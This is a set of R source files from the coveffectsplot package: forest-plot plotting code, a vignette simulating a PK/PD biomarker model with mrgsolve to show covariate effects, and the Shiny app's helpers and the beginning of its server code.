strip.placement = strip_placement,
legend.spacing.x = ggplot2::unit(legend_space_x_mult*11, "pt"),
legend.margin = ggplot2::margin(t = legend_margin[1],
r = legend_margin[2],
b = legend_margin[3],
l = legend_margin[4],
unit='pt'),
plot.margin = ggplot2::margin(t = plot_margin[1],
r = plot_margin[2],
b = plot_margin[3],
l = plot_margin[4],
unit='pt')
) +
ggplot2::ggtitle("\n")
if (!strip_outline) {
main_plot <- main_plot +
ggplot2::theme(strip.background=ggplot2::element_blank())
}
if (!show_yaxis_gridlines) {
main_plot <- main_plot +
ggplot2::theme(panel.grid.major.y = ggplot2::element_blank(),
panel.grid.minor.y = ggplot2::element_blank())
}
if (!show_xaxis_gridlines) {
main_plot <- main_plot +
ggplot2::theme(panel.grid.major.x = ggplot2::element_blank(),
panel.grid.minor.x = ggplot2::element_blank())
}
main_plot <- main_plot +
ggplot2::xlab(xlabel)
main_plot <- main_plot +
ggplot2::ylab(ylabel)
if (grepl("^\\s+$", ylabel) ){
main_plot <- main_plot +
ggplot2::theme(axis.title.y=ggplot2::element_blank())
}
if (grepl("^\\s+$", xlabel) ){
main_plot <- main_plot +
ggplot2::theme(axis.title.x=ggplot2::element_blank())
}
main_plot <- main_plot +
ggplot2::scale_x_continuous(trans = ifelse(logxscale,"log","identity"))
if (length(major_x_ticks) || length(minor_x_ticks)) {
main_plot <- main_plot +
ggplot2::scale_x_continuous(trans = ifelse(logxscale,"log","identity"),
breaks = major_x_ticks,
minor_breaks = minor_x_ticks
)
}
if (!is.null(x_range)) {
main_plot <- main_plot +
ggplot2::coord_cartesian(xlim = x_range)
}
if (theme_benrich){
main_plot <- main_plot +
ggplot2::theme(
panel.spacing=ggplot2::unit(0, "pt"),
panel.grid = ggplot2::element_blank(),
panel.grid.minor = ggplot2::element_blank(),
strip.background = ggplot2::element_blank(),
strip.text.y = y.strip.text,
strip.text.y.left = y.strip.text,
strip.text.x= x.strip.text,
plot.margin = ggplot2::margin(t=3,r=3,b=3,l=3,unit="pt")
)
}
if (table_position != "none") {
table_plot <- ggplot2::ggplot(data = data,
ggplot2::aes_string(y = "label"))
table_plot <- table_plot +
ggplot2::aes_string(group = "paramname") +
ggplot2::geom_text(
ggplot2::aes_string(
x = 1,
label = "LABEL",
hjust = 0.5
),
size = table_text_size,
position = ggstance::position_dodgev(height = vertical_dodge_height)
)
if (table_facet_switch != "none") {
table_plot <- table_plot +
ggplot2::facet_grid(facet_formula,
scales = facet_scales,
space = facet_space,
switch = table_facet_switch,
labeller = facet_labeller)
} else {
table_plot <- table_plot +
ggplot2::facet_grid(facet_formula,
scales = facet_scales,
space = facet_space,
switch = NULL,
labeller = facet_labeller)
}
table_plot <- table_plot +
ggplot2::theme_bw(base_size = base_size) +
ggplot2::theme(
axis.text.y = ggplot2::element_text(
angle = 0,
size = y_label_text_size
),
strip.text.x = table.x.strip.text,
axis.text.x = ggplot2::element_text(size = x_label_text_size),
axis.ticks.x= ggplot2::element_blank(),
strip.text.y = table.y.strip.text,
strip.text.y.left = table.y.strip.text,
axis.title.x = ggplot2::element_blank(),
axis.title.y = ggplot2::element_blank(),
panel.grid.major.x = ggplot2::element_blank(),
panel.grid.minor.x = ggplot2::element_blank(),
panel.grid.major.y = ggplot2::element_blank(),
panel.grid.minor.y = ggplot2::element_blank(),
panel.spacing = ggplot2::unit(facet_spacing, "pt"),
strip.background = ggplot2::element_rect(fill = strip_col),
strip.placement = strip_placement,
plot.margin = ggplot2::margin(t = table_margin[1],
r = table_margin[2],
b = table_margin[3],
l = table_margin[4],
unit='pt')
) +
ggplot2::theme(legend.position = "none")+
ggplot2::scale_x_continuous(breaks = c(1), labels = "", limits = c(0.99, 1.01))
if (!strip_outline) {
table_plot <- table_plot +
ggplot2::theme(strip.background=ggplot2::element_blank())
}
if (show_table_facet_strip=="none") {
table_plot <- table_plot +
ggplot2::theme(
strip.text.x = ggplot2::element_blank(),
strip.text.y = ggplot2::element_blank(),
strip.text.y.left = ggplot2::element_blank(),
strip.background.x = ggplot2::element_blank(),
strip.background.y = ggplot2::element_blank()
)
}
if (show_table_facet_strip=="y") {
table_plot <- table_plot +
ggplot2::theme(
strip.text.x = ggplot2::element_blank(),
strip.background.x = ggplot2::element_blank()
)
}
if (show_table_facet_strip=="x") {
table_plot <- table_plot +
ggplot2::theme(
strip.text.y = ggplot2::element_blank(),
strip.text.y.left = ggplot2::element_blank(),
strip.background.y = ggplot2::element_blank()
)
}
if (!show_table_yaxis_tick_label) {
table_plot <- table_plot +
ggplot2::theme(
axis.title.y = ggplot2::element_blank(),
axis.text.y = ggplot2::element_blank(),
axis.ticks.y = ggplot2::element_blank()
)
}
if (!reserve_table_xaxis_label_space) {
table_plot <- table_plot +
ggplot2::theme(
axis.text.x= ggplot2::element_blank(),
axis.ticks.x= ggplot2::element_blank()
)
}
if (!table_panel_border) {
table_plot <- table_plot +
ggplot2::theme(
panel.border = ggplot2::element_blank()
)
}
if (theme_benrich){
table_plot <- table_plot +
ggplot2::ggtitle(table_title)+
ggplot2::theme(
plot.title=ggplot2::element_text(
size=table_title_size,hjust=0.5, vjust=1,margin=
ggplot2::margin(b=ggplot2::unit(6, "pt"))),
strip.background=ggplot2::element_blank(),
panel.border = ggplot2::element_blank(),
panel.spacing = ggplot2::unit(0, "pt"),
axis.ticks = ggplot2::element_blank(),
plot.margin = ggplot2::margin(t=3,r=3,b=3,l=3,unit="pt")
)
if (show_table_facet_strip %in% c("y")) {
table_plot <- table_plot +
ggplot2::theme(
strip.text.y= table.y.strip.text
)
}
if (show_table_facet_strip %in% c("x")) {
table_plot <- table_plot +
ggplot2::theme(
strip.text.x = table.x.strip.text
)
}
if (show_table_facet_strip %in% c("both")) {
table_plot <- table_plot +
ggplot2::theme(
strip.text.y= table.y.strip.text,
strip.text.x= table.x.strip.text
)
}
}
}
if (table_position == "none") {
result <- main_plot
} else if (table_position == "right") {
result <- egg::ggarrange(
main_plot,
table_plot,
nrow = 1,
widths = c(plot_table_ratio, 1)
)
} else if (table_position == "below") {
result <- egg::ggarrange(
main_plot,
table_plot,
nrow = 2,
heights = c(plot_table_ratio, 1)
)
}
if (return_list) {
result <- list(main_plot, table_plot)
}
result
}
<file_sep>/vignettes/PKPD_Example.Rmd
---
title: "PK/PD Model: Assessing the Impact of Covariates on a Biomarker"
output:
rmarkdown::html_vignette:
toc: true
df_print: kable
vignette: >
%\VignetteIndexEntry{PKPD_Example}
%\VignetteEngine{knitr::rmarkdown}
%\VignetteEncoding{UTF-8}
---
```{r, include = FALSE}
knitr::opts_chunk$set(
collapse = TRUE,
warning =FALSE,
message =FALSE,
comment = "#>",
dev.args = list(png = list(type = "cairo"))
)
library(coveffectsplot)
library(mrgsolve)
library(ggplot2)
library(ggstance)
library(ggridges)
library(tidyr)
library(dplyr)
library(table1)
library(patchwork)
library(data.table)
theme_set(theme_bw())
#utility function to simulate varying one covariate at a time keeping the rest at the reference
expand.modelframe <- function(..., rv, covcol="covname") {
args <- list(...)
df <- lapply(args, function(x) x[[1]])
df[names(rv)] <- rv
res <- lapply(seq_along(rv), function(i) {
df[[covcol]] <- names(rv)[i]
df[[names(rv)[i]]] <- args[[names(rv)[i]]]
as.data.frame(df)
})
do.call(rbind, res)
}
cor2cov <- function (cor, sd)
{
if (missing(sd)) {
sd <- diag(cor)
}
diag(cor) <- 1
n <- nrow(cor)
diag(sd, n) %*% cor %*% diag(sd, n)
}
nbsvsubjects <- 100
nsim <- 100 # uncertainty replicates; for real analyses you might want a higher number
round_pad <- function(x, digits = 2, round5up = TRUE) {
eps <- if (round5up) x * (10^(-(digits + 3))) else 0
formatC(round(x + eps, digits), digits = digits, format = "f", flag = "0")
}
```
## Specifying a PK/PD Model using `mrgsolve`
Here we use the same two-compartment PK model linked to an indirect response PD model, with the drug inhibiting the rate constant of input (Kin). The model includes several covariate effects on Clearance, Volume and Kin. The baseline PD value is controlled by the ratio Kin/Kout.
```{r pkpdmodel, collapse=TRUE }
codepkpdmodelcov <- '
$PARAM @annotated
KA : 0.5 : Absorption rate constant Ka (1/h)
CL : 4 : Clearance CL (L/h)
V : 10 : Central volume Vc (L)
Vp : 50 : Peripheral volume Vp (L)
Qp : 10 : Intercompartmental clearance Q (L/h)
CLALB : -0.8 : Albumin on CL (ref. 45 g/L)
CLSEX : 0.2 : Sex on CL (ref. Female)
CLWT : 1 : Weight on CL (ref. 85 kg)
VSEX : 0.07 : Sex on Vc (ref. Female)
VWT : 1 : Weight on Vc (ref. 85 kg)
KIN : 3 : Zero-order Rate constant of biomarker production (amount/h)
KOUT : 0.06 : First-order Rate constant of biomarker loss (1/h)
IC50 : 3 : Drug concentration producing 50% of maximum inhibition
IMAX : 0.999 : Maximum Inhibition Response
gamma : 0.55 : Sigmoidicity factor of the sigmoid Emax equation
KINWT : 0.4 : Weight on KIN (ref. 85 kg)
KINAGE : -0.08 : Age on KIN (ref. 40 years)
KINHLTY: 1.5 : Health status on KIN (ref. Diseased)
$PARAM @annotated // reference values for covariate
WT : 85 : Weight (kg)
SEX : 0 : Sex (0=Female, 1=Male)
ALB : 45 : Albumin (g/L)
AGE : 40 : Age (years)
HEALTHY: 0 : Health Status (0=Diseased, 1=Healthy)
$CMT GUT CENT PER RESP
$GLOBAL
#define CP (CENT/Vi)
#define CPER (PER/Vpi)
#define INH (IMAX*pow(CP,gamma)/(pow(IC50,gamma)+pow(CP,gamma)))
#define PDRESP RESP
$MAIN
double KAi = KA;
double Vpi = Vp *pow((WT/70.0), 1);
double Qpi = Qp *pow((WT/70.0), 0.75);
double CLi = CL *
pow((ALB/45.0), CLALB)*
(SEX == 1.0 ? (1.0+CLSEX) : 1.0)*
pow((WT/85.0), CLWT)*exp(ETA(1));
double Vi = V *
(SEX == 1.0 ? (1.0+VSEX) : 1.0)*
pow((WT/85.0), VWT)*exp(ETA(2));
double KINi = KIN *
pow((AGE/40), KINAGE)*
(HEALTHY == 1.0 ? KINHLTY : 1.0)*
pow((WT/85.0), KINWT)*exp(ETA(3));
double RESP_0 = KINi/KOUT;
$OMEGA
0.09
0.01 0.09
$OMEGA
0.25
$ODE
dxdt_GUT = -KAi *GUT;
dxdt_CENT = KAi *GUT - (CLi+Qpi)*CP + Qpi*CPER;
dxdt_PER = Qpi*CP - Qpi*CPER;
dxdt_RESP = KINi*(1-INH) - KOUT*RESP;
$CAPTURE CP PDRESP KAi CLi Vi Vpi Qpi WT SEX ALB AGE HEALTHY
'
modpkpdsim <- mcode("codepkpdmodelcov", codepkpdmodelcov)
partab <- setDT(modpkpdsim@annot$data)[block=="PARAM", .(name, descr, unit)]
partab <- merge(partab, melt(setDT(modpkpdsim@param@data), meas=patterns("*"), var="name"))
knitr::kable(partab)
```
### Simulate Reference Subjects with BSV
We simulate at reference covariate values with between subject variability (BSV) and then we show a plot of the PK and PD profiles of five random subjects.
```{r pkpdsimulation, fig.width=7,fig.height=4, message=FALSE }
idata <- data.table(ID=1:nbsvsubjects, WT=85, SEX=0, ALB=45, AGE=40, HEALTHY = 0)
ev1 <- ev(time = 0, amt = 100, cmt = 1, ii = 24, addl = 20)
data.dose <- ev(ev1)
data.dose <- setDT(as.data.frame(data.dose))
data.all <- data.table(idata, data.dose)
set.seed(678549)
outputpkpdsim <- modpkpdsim %>%
data_set(data.all) %>%
mrgsim(end = 28*24, delta = 0.25) %>%
as.data.frame %>%
as.data.table
outputpkpdsim$HEALTHY <- as.factor(outputpkpdsim$HEALTHY)
yvar_names <- c(
'CP'="Plasma Concentrations",
'RESP'="PD Values"
)
set.seed(678549)
outputpkpdsimlong <- outputpkpdsim[outputpkpdsim$ID %in%
sample(unique(outputpkpdsim$ID), 5), ] %>%
gather(key,value,CP,RESP)
ggplot(data =outputpkpdsimlong ,
aes(time, value, group = ID)) +
geom_line(alpha = 0.8, size = 0.3) +
facet_grid(key ~ID,scales="free_y",switch="y",
labeller = labeller(key=yvar_names)) +
labs(y = "", color = "Sex", x = "Time (h)")+
theme(strip.placement = "outside",
axis.title.y=element_blank())
```
### Compute PD Parameters and Summarize BSV
Here we compute the PD baseline (where we start), the nadir (minimum response achieved) and the delta (difference) between the baseline and the nadir. We then summarize and report the BSV around these parameters as ranges covering 50% and 90% of patients, and show a plot of the first 10 replicates as an example of the simulated PD profiles. Since the plotting code is similar to the PK Example vignette it is not shown.
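As a tiny worked example of these definitions (values invented for illustration):
```{r pdparamtoy, collapse=TRUE}
# For a response profile of 50, 30, 20, 35 the baseline is 50 (first value),
# the nadir is 20 (minimum) and the delta is 50 - 20 = 30.
resp <- c(50, 30, 20, 35)
c(baseline = resp[1], nadir = min(resp), delta = resp[1] - min(resp))
```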
```{r computenca , fig.width=7, message=FALSE }
derive.exposure <- function(time, PDRESP) {
x <- c(
nadir = min(PDRESP, na.rm = TRUE),
baselinepd = PDRESP[1L],
deltapd = PDRESP[1L]-min(PDRESP, na.rm = TRUE)
)
data.table(paramname=names(x), paramvalue=x)
}
refbsv <- outputpkpdsim[, derive.exposure(time, PDRESP),
by=.(ID, WT, SEX, ALB, AGE, HEALTHY)]
refbsv[, stdparamvalue := paramvalue/median(paramvalue), by=paramname]
bsvranges <- refbsv[,list(
P05 = quantile(stdparamvalue, 0.05),
P25 = quantile(stdparamvalue, 0.25),
P50 = quantile(stdparamvalue, 0.5),
P75 = quantile(stdparamvalue, 0.75),
P95 = quantile(stdparamvalue, 0.95)), by = paramname]
bsvranges
```
```{r pd1, fig.width=7,fig.height=4, include=FALSE }
# set.seed(678549)
# outputpkpdsimlong <- outputpkpdsim %>%
# gather(key,value,CP,RESP)
# outputpkpdsimlong$SEX <- as.factor(outputpkpdsimlong$SEX )
# outputpkpdsimlong$SEX <- factor(outputpkpdsimlong$SEX, labels=c("Female"))
# pd1<- ggplot(data =outputpkpdsimlong ,
# aes(time/24, value, group = ID)) +
# geom_line(alpha = 0.1, size = 0.3) +
# facet_grid(key ~WT+ALB+SEX,scales="free_y",switch="y",
# labeller = labeller(key=yvar_names, WT= label_both,
# ALB= label_both,SEX= label_both,.multi_line = FALSE)) +
# labs(y = "", color = "Sex", x = "Time (days)")+
# theme_bw(base_size=18)+
# theme(strip.placement = "outside",
# axis.title.y=element_blank())
# pd1
# ggsave("pd1.png", device="png",type="cairo-png", width = 7, height = 5.5,dpi=72)
# p4 <- ggplot(refbsv,
# aes(x=stdparamvalue,y=paramname,fill=factor(..quantile..),height=..ndensity..))+
# facet_wrap(~paramname,scales="free_y",ncol=1)+
# stat_density_ridges(
# geom = "density_ridges_gradient", calc_ecdf = TRUE,
# quantile_lines = TRUE, rel_min_height = 0.001,scale=0.9,
# quantiles = c(0.05,0.25,0.5,0.75, 0.95)) +
# scale_fill_manual(
# name = "Probability", values = c("white","#FF000050","#FF0000A0", "#FF0000A0","#FF000050","white"),
# labels = c("(0, 0.05]", "(0.05, 0.25]",
# "(0.25, 0.5]","(0.5, 0.75]",
# "(0.75, 0.95]","(0.95, 1]")
# )+
# theme_bw(base_size=22)+
# theme(legend.position = "none",
# axis.text.y=element_blank(),axis.ticks.y = element_blank())+
# labs(x="Standardized PD Parameters",y="")+
# scale_x_log10()+
# coord_cartesian(expand = FALSE)
# p4
# ggsave("pd2.png", device="png",type="cairo-png")
#
# p4 <- p4+theme_bw(base_size=18) +
# theme(
# axis.title.x =element_text(size=12),
# legend.position = "none",
# strip.background = element_blank(),
# strip.text = element_blank(),
# panel.spacing = unit(10,"mm"),
# plot.margin = margin(0,10,0,0))
# pd1 <- pd1+theme_bw(base_size=18) +
# theme(plot.margin = margin(0,0,0,10),
# strip.placement = "outside",
# axis.title.y=element_blank())
# png("Figure_S_PD_1.png", type="cairo-png",width= 2*7*72, height =5*72)
# egg::ggarrange(pd1 ,p4,widths = c(2,1.5),ncol=2)
# dev.off()
```
## Construct and Simulate at Combinations of Covariates of Interest
As in the PK Example vignette, we generate covariate combinations of interest and simulate with parameter uncertainty using an invented variance-covariance matrix.
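To make the construction concrete, here is a small sketch of what the `cor2cov` helper (defined in the setup chunk) does, using a toy 2x2 correlation matrix and standard deviations set to 15% of two hypothetical parameter values:
```{r cor2covsketch, collapse=TRUE}
# cor2cov() converts a correlation matrix plus SDs into a variance-covariance
# matrix; the values below are illustrative only.
cor2cov(matrix(c(1, 0.2, 0.2, 1), nrow = 2), sd = c(4, 10) * 0.15)
```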
```{r covcomb , fig.width=7}
reference.values <- data.frame(WT = 85, ALB = 45, AGE = 40, SEX = 0, HEALTHY = 0)
covcomb <- expand.modelframe(
WT = c(56,128),
AGE = c(20,60),
ALB = c(40,50),
  SEX = c(1), # Reference is SEX = 0
  HEALTHY = c(1), # Reference is HEALTHY = 0
rv = reference.values)
# Add the reference
covcomb <- rbind(covcomb, data.table(reference.values, covname="REF"))
covcomb$ID <- 1:nrow(covcomb)
covcomb
```
```{r, fig.width=7 ,message=FALSE, include=FALSE}
idata <- data.table::copy(covcomb)
idata$covname <- NULL
ev1 <- ev(time=0, amt=100, cmt=1, ii = 24, addl = 20)
data.dose <- as.data.frame(ev1)
data.all <- data.table(idata, data.dose)
outcovcomb<- modpkpdsim %>%
data_set(data.all) %>%
zero_re() %>%
mrgsim(start=0,end=24*28,delta=0.25)%>%
as.data.frame %>%
as.data.table
outcovcomb$SEX <- as.factor(outcovcomb$SEX )
outcovcomb$SEX <- factor(outcovcomb$SEX, labels=c("Female", "Male"))
outcovcomb$HEALTHY <- as.factor(outcovcomb$HEALTHY )
theta <- unclass(as.list(param(modpkpdsim)))
theta[c("WT", "SEX", "ALB","AGE","HEALTHY")] <- NULL
theta <- unlist(theta)
as.data.frame(t(theta))
varcov <- cor2cov(
matrix(0.2, nrow=length(theta), ncol=length(theta)),
sd=theta*0.15)
rownames(varcov) <- colnames(varcov) <- names(theta)
as.data.frame(varcov)
set.seed(678549)
# mvtnorm::rmvnorm is another option that can be explored
sim_parameters <- MASS::mvrnorm(nsim, theta, varcov, empirical=T) %>% as.data.table
head(sim_parameters)
idata <- data.table::copy(covcomb)
idata$covname <- NULL
ev1 <- ev(time=0, amt=100, cmt=1, ii = 24, addl = 20)
data.dose <- as.data.frame(ev1)
iter_sims <- NULL
for(i in 1:nsim) {
data.all <- data.table(idata, data.dose, sim_parameters[i])
out <- modpkpdsim %>%
data_set(data.all) %>%
zero_re() %>%
mrgsim(start=0, end=28*24, delta=0.25) %>%
as.data.frame %>%
as.data.table
out[, rep := i]
iter_sims <- rbind(iter_sims, out)
}
iter_sims$SEX <- as.factor(iter_sims$SEX )
iter_sims$SEX <- factor(iter_sims$SEX, labels=c("Female", "Male"))
```
```{r, fig.width=7, fig.height=6, message=FALSE, warning=FALSE}
pdprofiles <- ggplot(iter_sims[iter_sims$rep<=10,], aes(time/24,PDRESP,col=factor(WT),linetype=factor(HEALTHY) ) )+
geom_line(aes(group=interaction(ID,rep)),alpha=0.3,size=0.3)+
geom_line(data=outcovcomb,aes(group=interaction(ID)),color="black")+
facet_grid(SEX+ALB~ AGE+WT,labeller = label_both)+
labs(linetype="No Uncertainty\nHealthy",
colour="Uncertainty\nReplicates\n(1 to 10)\nWeight (kg)",
caption ="Simulation\nwith Uncertainty without BSV" ,
x="Days", y = "PD Values")+
guides(colour = guide_legend(override.aes = list(alpha = 1)))
pdprofiles
```
### Compute PD Parameters and Distribution Plots
As above, we compute the PD parameters, standardize them by the reference median and provide a distribution plot. Since the code is similar to the PK Example vignette it is not shown.
```{r, fig.width=7,fig.height=6, include=FALSE, message=FALSE}
out.df.univariatecov.nca <- iter_sims[, derive.exposure(time, PDRESP),
by=.(rep, ID, WT, SEX, ALB, AGE, HEALTHY)]
out.df.univariatecov.nca
refvalues <- out.df.univariatecov.nca[
ALB==45 & WT==85 & SEX=="Female"& AGE==40 & HEALTHY==0,
.(medparam = median(paramvalue)), by=paramname]
refvalues
covcomb <- as.data.table(covcomb)
covcomb[covname=="WT", covvalue := paste(WT,"kg")]
covcomb[covname=="ALB", covvalue := paste(ALB,"g/L")]
covcomb[covname=="AGE", covvalue := paste(AGE,"years")]
covcomb[covname=="SEX", covvalue := "Male"]
covcomb[covname=="HEALTHY", covvalue := "Diseased"]
covcomb[covname=="REF", covvalue := "85 kg-Female-45 g/L-40 years-healthy"]
covcomb
covcomb[covname=="REF", covvalue := "85 kg-Female\n45 g/L-40 years\nhealthy"]
covcomb <- as.data.table(covcomb)
out.df.univariatecov.nca <- merge(
out.df.univariatecov.nca,
covcomb[, .(ID, covname, covvalue)])
setkey(out.df.univariatecov.nca, paramname)
setkey(refvalues, paramname)
out.df.univariatecov.nca <- merge(out.df.univariatecov.nca,refvalues)
out.df.univariatecov.nca[, paramvaluestd := paramvalue/medparam]
out.df.univariatecov.nca$covvalue <-factor(as.factor(out.df.univariatecov.nca$covvalue ),
levels = c("56 kg",
"85 kg",
"128 kg",
"Male",
"40 g/L",
"50 g/L",
"20 years",
"60 years",
"Diseased",
"85 kg-Female\n45 g/L-40 years\nhealthy")
)
out.df.univariatecov.nca[covname=="WT", covname2 := "Weight"]
out.df.univariatecov.nca[covname=="ALB", covname2 := "Albumin"]
out.df.univariatecov.nca[covname=="SEX", covname2 := "Sex"]
out.df.univariatecov.nca[covname=="AGE", covname2 := "Age"]
out.df.univariatecov.nca[covname=="HEALTHY", covname2 := "Healthy"]
out.df.univariatecov.nca[covname=="REF", covname2 := "Reference"]
# covname2 must be created (above) before it can be converted to a factor
out.df.univariatecov.nca$covname2 <- factor(out.df.univariatecov.nca$covname2,
                       levels= c( "Weight", "Sex",
                                  "Albumin","Age", "Healthy",
                                  "Reference")
)
boxplotdat <- out.df.univariatecov.nca
```
```{r, fig.width=7, fig.height=5, message=FALSE}
boxplotpd <- ggplot(boxplotdat,
aes(x=covvalue ,y=paramvalue))+
facet_grid(paramname ~covname2,scales="free",switch="both",
labeller = label_parsed)+
geom_boxplot()+
theme(axis.title = element_blank(),strip.placement = "outside")+
labs(y="PD Parameter Values",x="Covariate Value")
boxplotpd
```
```{r, fig.width=7 ,message=FALSE, include=FALSE}
# pdprofiles<- pdprofiles+theme(axis.title.y = element_text(size=15))+
# guides(colour=guide_legend(override.aes = list(alpha=1,size=0.5)),
# linetype=guide_legend(override.aes = list(size=0.5)))
# pdprofiles
# ggsave("pd3.png", device="png",type="cairo-png",width= 7, height = 5,dpi=72)
# boxplotpd
# ggsave("pd4.png", device="png",type="cairo-png",width= 7, height = 4,dpi=2*72)
# png("Figure_S_PD_2.png", type="cairo-png",width= 2*7*72, height =5*72)
# egg::ggarrange(pdprofiles,boxplotpd,nrow=1)
# dev.off()
```
```{r, fig.width=7,fig.height=5,message=FALSE}
pdggridges<- ggplot(out.df.univariatecov.nca,
aes(x=paramvaluestd,y=covvalue,fill=factor(..quantile..),height=..ndensity..))+
facet_grid(covname2~paramname,scales="free_y",space="free")+
annotate( "rect",
xmin = 0.5,
xmax = 2,
ymin = -Inf,
ymax = Inf,
fill = "gray",alpha=0.4
)+
stat_density_ridges(
geom = "density_ridges_gradient", calc_ecdf = TRUE,
quantile_lines = TRUE, rel_min_height = 0.001,scale=0.9,
quantiles = c(0.05,0.5, 0.95)) +
scale_fill_manual(
name = "Probability", values = c("white", "#0000FFA0","#0000FFA0", "white"),
labels = c("(0, 0.05]", "(0.05, 0.5]","(0.5, 0.95]", "(0.95, 1]")
)+
geom_vline( aes(xintercept = 1),size = 1)+
theme_bw()+
labs(x="Effects Relative to Parameter Reference value",y="")+
  scale_x_log10(breaks=c(0.25,0.5,0.8,1/0.8,1/0.5,1/0.25))
pdggridges
```
```{r, fig.width=7 ,message=FALSE, include=FALSE}
# pdggridges+theme(legend.position = "none")
# ggsave("Figure_S_PD_3.png", device="png",type="cairo-png",
# width= 7, height = 5,dpi=72)
```
### Summarize, add BSV and Use `forest_plot`
We show how a plot and table spanning multiple parameters and multiple covariates can be produced.
```{r, fig.width=7, fig.height=7 ,message=FALSE}
coveffectsdatacovrep <- out.df.univariatecov.nca %>%
dplyr::group_by(paramname,covname,covvalue) %>%
dplyr::summarize(
mid= median(paramvaluestd),
lower= quantile(paramvaluestd,0.05),
upper = quantile(paramvaluestd,0.95))
coveffectsdatacovreplabel<- coveffectsdatacovrep %>%
mutate(
label= covvalue,
LABEL = paste0(format(round(mid,2), nsmall = 2),
" [", format(round(lower,2), nsmall = 2), "-",
format(round(upper,2), nsmall = 2), "]"))
```
```{r, fig.width=7, fig.height=7 ,message=FALSE}
setkey(bsvranges, paramname)
coveffectsdatacovrepbsv <- coveffectsdatacovrep[coveffectsdatacovrep$covname=="REF",]
coveffectsdatacovrepbsv$covname <- "BSV"
coveffectsdatacovrepbsv$covvalue <- "50% of patients"
coveffectsdatacovrepbsv$label <- "50% of patients"
coveffectsdatacovrepbsv$lower <- bsvranges$P25
coveffectsdatacovrepbsv$upper <- bsvranges$P75
coveffectsdatacovrepbsv2 <- coveffectsdatacovrep[coveffectsdatacovrep$covname=="REF",]
coveffectsdatacovrepbsv2$covname <- "BSV"
coveffectsdatacovrepbsv2$covvalue <- "90% of patients"
coveffectsdatacovrepbsv2$label <- "90% of patients"
coveffectsdatacovrepbsv2$lower <- bsvranges$P05
coveffectsdatacovrepbsv2$upper <- bsvranges$P95
coveffectsdatacovrepbsv<- rbind(coveffectsdatacovrep,coveffectsdatacovrepbsv,coveffectsdatacovrepbsv2)
coveffectsdatacovrepbsv <- coveffectsdatacovrepbsv %>%
mutate(
label= covvalue,
LABEL = paste0(format(round(mid,2), nsmall = 2),
" [", format(round(lower,2), nsmall = 2), "-",
format(round(upper,2), nsmall = 2), "]"))
coveffectsdatacovrepbsv<- as.data.frame(coveffectsdatacovrepbsv)
coveffectsdatacovrepbsv$label <- as.factor(coveffectsdatacovrepbsv$covvalue )
coveffectsdatacovrepbsv$label <- reorder(coveffectsdatacovrepbsv$label,
coveffectsdatacovrepbsv$lower)
coveffectsdatacovrepbsv$covname <-factor(as.factor(coveffectsdatacovrepbsv$covname ),levels =c("WT","SEX","ALB","AGE","HEALTHY", "REF", "BSV"),
labels= c("Weight","Sex","Albumin","Age","Healthy", "Reference", "BSV")
)
interval_legend_text <- "Median (points)\n90% CI (horizontal lines)"
interval_bsv_text <- "BSV (points)\nPrediction Intervals (horizontal lines)"
ref_legend_text <- "Reference\n(vertical line)\nClinically relevant limits\n(gray area)"
area_legend_text <- "Reference\n(vertical line)\nClinically relevant limits\n(gray area)"
png("./Figure_S_PD_4.png",width =12 ,height = 9,units = "in",res=72)
coveffectsplot::forest_plot(coveffectsdatacovrepbsv,
ref_area = c(0.5, 1/0.5),
x_range = c(0.25,4),
strip_placement = "outside",
base_size = 16,
y_label_text_size = 12,
xlabel = "Fold Change Relative to Reference",
ref_legend_text = ref_legend_text,
area_legend_text =area_legend_text,
interval_legend_text = interval_legend_text,
interval_bsv_text = interval_bsv_text,
facet_formula = "covname~paramname",
facet_switch = "y",
facet_scales = "free_y",
facet_space = "fixed",
paramname_shape = FALSE,
table_position = "below",
table_text_size=4,
plot_table_ratio = 1,
table_facet_switch = "both",
show_table_facet_strip = "both",
show_table_yaxis_tick_label = TRUE,
logxscale = TRUE,
major_x_ticks = c(0.5,1,1/0.5),
table_margin = c(0,5.5,0,0),
plot_margin =c(0,5.5,0,0),
reserve_table_xaxis_label_space = FALSE,
return_list = FALSE)
dev.off()
# consider returning a list and editing the y axis label line breaks height
# theme(axis.text.y = element_text(lineheight = ))
```

<file_sep>/inst/shiny/global.r
suppressPackageStartupMessages({
library(coveffectsplot)
library(dplyr)
library(tidyr)
library(egg)
library(ggplot2)
library(ggstance)
library(shiny)
library(shinyjs)
library(markdown)
library(colourpicker)
library(shinymeta)
})
escape_newline <- function(s) {
gsub("\\\\n", "\\\n", s)
}
round_pad <- function(x, digits = 2, round5up = TRUE) {
eps <- if (round5up) x * (10^(-(digits + 3))) else 0
formatC(round(x + eps, digits), digits = digits, format = "f", flag = "0")
}
###from table1
signif_pad <- function (x, digits = 3, round.integers = TRUE, round5up = TRUE)
{
eps <- if (round5up)
x * (10^(-(digits + 3)))
else 0
if (round.integers) {
cx <- as.character(signif(x + eps, digits))
}
else {
cx <- ifelse(x >= 10^digits, as.character(round(x)),
as.character(signif(x + eps, digits)))
}
cx[is.na(x)] <- "0"
d <- gsub("[^0-9]", "", cx)
d <- sub("^0*", "", d)
nd <- nchar(d)
nd[cx == "0"] <- 1
npad <- pmax(0, digits - nd)
pad <- sapply(npad, function(n) paste(rep("0", times = n),
collapse = ""))
has.dec <- grepl("\\.", cx)
add.dec <- ifelse(!has.dec & npad > 0, ".", "")
ifelse(is.na(x), NA, paste(cx, add.dec, pad, sep = ""))
}
###from table1
<file_sep>/inst/shiny/server.R
function(input, output, session) {
maindata <- reactiveVal(NULL)
# If this app was launched from a function that explicitly set an initial dataset
if (exists("coveffectsplot_initdata")) {
maindata(get("coveffectsplot_initdata"))
}
# Set the data source
observeEvent(input$datafile, {
file <- input$datafile$datapath
maindata(read.csv(file, na.strings = c("NA", ".")))
})
observeEvent(input$sample_data_btn, {
data <- get_sample_data()
maindata(data)
})
# Show inputs once the data source exists
observeEvent(maindata(), once = TRUE, {
shinyjs::show("exposurevariables")
shinyjs::show("covariates")
shinyjs::show("covvalueorder")
shinyjs::show("shapebyparamname")
shinyjs::show("vdodgeheight")
shinyjs::show("get_code")
})
# Update the options in different inputs based on data
observe({
df <- maindata()
shiny::req(df)
choices <- unique(df[["paramname"]])
updateSelectizeInput(session, "exposurevariables",
choices = choices, selected = choices[1])
})
observe({
df <- maindata()
shiny::req(df)
df <- df %>%
filter(paramname %in% c(input$exposurevariables))
choices <- unique(df[["covname"]])
updateSelectizeInput(session, "covariates",
choices = choices, selected = choices)
})
observe({
df <- maindata()
shiny::req(df)
df <- df %>%
filter(paramname %in% c(input$exposurevariables)) %>%
filter(covname %in% c(input$covariates))
